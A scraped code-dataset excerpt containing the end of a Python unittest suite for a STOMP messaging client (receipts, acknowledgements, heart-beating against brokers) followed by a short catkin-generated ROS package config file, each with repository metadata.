self.assertTrue(client.canRead(self.TIMEOUT))
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4711'}))
self.assertFalse(client.canRead(self.TIMEOUT))
client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 4711, StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
client.disconnect(receipt='4712')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712'}))
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.disconnect(receipt='4711')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4711'}))
client.close()
self.assertRaises(StompConnectionError, client.canRead, 0)
def test_5_integration_stomp_1_1_heartbeat(self):
if BROKER == 'apollo':
print "Broker %s doesn't properly support heart-beating. Skipping test." % BROKER
return
if StompSpec.VERSION_1_1 not in commands.versions(VERSION):
print 'This broker does not support STOMP protocol version 1.1'
return
port = 61612 if (BROKER == 'activemq') else PORT # stomp+nio on 61613 does not work properly, so use stomp on 61612
client = Stomp(self.getConfig(StompSpec.VERSION_1_1, port))
self.assertEquals(client.lastReceived, None)
self.assertEquals(client.lastSent, None)
heartBeatPeriod = 100
client.connect(host=VIRTUALHOST, heartBeats=(heartBeatPeriod, heartBeatPeriod))
self.assertTrue((time.time() - client.lastReceived) < 0.1)
if not (client.serverHeartBeat and client.clientHeartBeat):
print 'broker does not support heart-beating. disconnecting ...'
client.disconnect()
client.close()
return
serverHeartBeatInSeconds = client.serverHeartBeat / 1000.0
clientHeartBeatInSeconds = client.clientHeartBeat / 1000.0
start = time.time()
while (time.time() - start) < (2.5 * max(serverHeartBeatInSeconds, clientHeartBeatInSeconds)):
time.sleep(0.5 * min(serverHeartBeatInSeconds, clientHeartBeatInSeconds))
client.canRead(0)
self.assertTrue((time.time() - client.lastReceived) < (1.5 * serverHeartBeatInSeconds))
if (time.time() - client.lastSent) > (0.5 * clientHeartBeatInSeconds):
client.beat()
self.assertTrue((time.time() - client.lastSent) < 0.1)
start = time.time()
try:
while not client.canRead(0.5 * clientHeartBeatInSeconds):
pass
except StompConnectionError:
self.assertTrue((time.time() - start) < (3.0 * clientHeartBeatInSeconds))
self.assertTrue((time.time() - client.lastReceived) < (1.5 * serverHeartBeatInSeconds))
self.assertTrue((time.time() - client.lastSent) > clientHeartBeatInSeconds)
else:
raise
client.close()
if __name__ == '__main__':
unittest.main()
| [
"akin.avci@irdeto.com"
] | akin.avci@irdeto.com |
3acebda40c7b000afc5ea51c29259bc92d74a4ff | a8a8bafeb2b8a7d302f48411a2777806f94010cc | /build/project/catkin_generated/pkg.develspace.context.pc.py | ed2a92a1b54338291e7545b40c4c75b250348bfc | [] | no_license | castillejoale/rescueRobots | 2498ea4454f275083d4d28b40c6f90c858939416 | b231b0e4510d4331c1288ce1bb093de4684b71cb | refs/heads/master | 2021-01-10T13:31:16.013380 | 2015-12-14T00:42:50 | 2015-12-14T00:42:50 | 47,943,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "project"
PROJECT_SPACE_DIR = "/home/cc/ee106a/fa15/class/ee106a-bv/project/devel"
PROJECT_VERSION = "0.0.0"
| [
"ee106a-bv@m92p-8"
] | ee106a-bv@m92p-8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.